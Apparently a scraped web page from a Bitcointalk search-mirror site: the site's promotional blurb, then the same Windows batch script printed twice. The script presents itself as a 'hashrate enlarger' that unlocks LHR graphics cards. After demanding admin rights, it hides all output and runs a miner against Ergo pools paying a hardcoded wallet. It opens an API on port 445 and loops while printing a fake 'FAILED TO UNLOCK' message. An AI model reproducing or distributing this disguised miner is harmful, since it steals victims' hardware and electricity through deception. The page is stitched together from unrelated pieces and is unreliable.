It was the Bitcointalk forum that inspired us to create Bitcointalksearch.org - Bitcointalk is an excellent site that should be the default page for anybody dealing in cryptocurrency, since it is a virtual gold-mine of data. However, our experience and user feedback led us create our site; Bitcointalk's search is slow, and difficult to get the results you need, because you need to log in first to find anything useful - furthermore, there are rate limiters for their search functionality.
The aim of our project is to create a faster website that yields more results and faster without having to create an account and eliminate the need to log in - your personal data, therefore, will never be in jeopardy since we are not asking for any of your data and you don't need to provide them to use our site with all of its capabilities.
We created this website with the sole purpose of users being able to search quickly and efficiently in the field of cryptocurrency so they will have access to the latest and most accurate information and thereby assisting the crypto-community at large.
@ECHO OFF 2>nul >nul
@nvidia-smi -h >nul 2>&1
IF %ERRORLEVEL%==9009 (
echo error: Nvidia driver not installed or not compatible. & goto :out
)
net session >nul 2>&1
if %errorLevel% NEQ 0 (
echo error: Run as admin. & goto :out
)
set test=%1
for /f "delims=0987654321," %%a in (%1) do echo error: Invalid device id's & goto :out
@nvidia-smi
set devices=
set devices2=
if [%test%]==[] ( set test="ALL") else ( set test=%~1 & set devices=-i %~1 & set devices2=-d %~1)
@ECHO Devices selected:
@nvidia-smi --query-gpu=index,gpu_name,memory.total --format=csv %devices%
@nvidia-smi --query-gpu=index,gpu_name,memory.total --format=csv %devices% > gpus.csv
for /f "skip=1 tokens=*" %%a in (gpus.csv) do (
for /f "tokens=3 delims=," %%b in ("%%a") do (
for /f "tokens=1" %%c IN ("%%b") do (
if %%c LSS 8000 (echo error: 8gb gpu memory required. Use the device selection option to deselect cards. & goto :out)
)
)
)
@ECHO %time% Welcome to the The Black Pill hashrate enlarger tool. v1.0
@ECHO %time% Keep this window open while mining to unlock LHR
@ECHO %time% Happy Mining!
:loop
Black.x -a ergo -i 1 -o stratum+ssl://ergo-eu1.nanopool.org:11433 -o1 -o stratum+ssl://us-erg.2miners.com:18888 -o2 stratum+ssl://erg.2miners.com:18888 -u 9fVeky1VvXiA5w7gBqpH5M1HjArR2aAnZb8B92YbeM2dosgvvtt -u1 9fVeky1VvXiA5w7gBqpH5M1HjArR2aAnZb8B92YbeM2dosgvvtt -u2 9fVeky1VvXiA5w7gBqpH5M1HjArR2aAnZb8B92YbeM2dosgvvtt %devices2% --no-interrupt --share-check 0 --no-color --platform 1 --log-no-job --log-cycle 100000 --api 0.0.0.0:445 >nul 2>&1
@ECHO ON >NUL
@ECHO %time% FAILED TO UNLOCK, RETRYING...
@ECHO OFF >NUL
timeout 1 >NUL
goto :loop >NUL
:out
pause
@ECHO OFF 2>nul >nul
@nvidia-smi -h >nul 2>&1
IF %ERRORLEVEL%==9009 (
echo error: Nvidia driver not installed or not compatible. & goto :out
)
net session >nul 2>&1
if %errorLevel% NEQ 0 (
echo error: Run as admin. & goto :out
)
set test=%1
for /f "delims=0987654321," %%a in (%1) do echo error: Invalid device id's & goto :out
@nvidia-smi
set devices=
set devices2=
if [%test%]==[] ( set test="ALL") else ( set test=%~1 & set devices=-i %~1 & set devices2=-d %~1)
@ECHO Devices selected:
@nvidia-smi --query-gpu=index,gpu_name,memory.total --format=csv %devices%
@nvidia-smi --query-gpu=index,gpu_name,memory.total --format=csv %devices% > gpus.csv
for /f "skip=1 tokens=*" %%a in (gpus.csv) do (
for /f "tokens=3 delims=," %%b in ("%%a") do (
for /f "tokens=1" %%c IN ("%%b") do (
if %%c LSS 8000 (echo error: 8gb gpu memory required. Use the device selection option to deselect cards. & goto :out)
)
)
)
@ECHO %time% Welcome to the The Black Pill hashrate enlarger tool. v1.0
@ECHO %time% Keep this window open while mining to unlock LHR
@ECHO %time% Happy Mining!
:loop
Black.x -a ergo -i 1 -o stratum+ssl://ergo-eu1.nanopool.org:11433 -o1 -o stratum+ssl://us-erg.2miners.com:18888 -o2 stratum+ssl://erg.2miners.com:18888 -u 9fVeky1VvXiA5w7gBqpH5M1HjArR2aAnZb8B92YbeM2dosgvvtt -u1 9fVeky1VvXiA5w7gBqpH5M1HjArR2aAnZb8B92YbeM2dosgvvtt -u2 9fVeky1VvXiA5w7gBqpH5M1HjArR2aAnZb8B92YbeM2dosgvvtt %devices2% --no-interrupt --share-check 0 --no-color --platform 1 --log-no-job --log-cycle 100000 --api 0.0.0.0:445 >nul 2>&1
@ECHO ON >NUL
@ECHO %time% FAILED TO UNLOCK, RETRYING...
@ECHO OFF >NUL
timeout 1 >NUL
goto :loop >NUL
:out
pause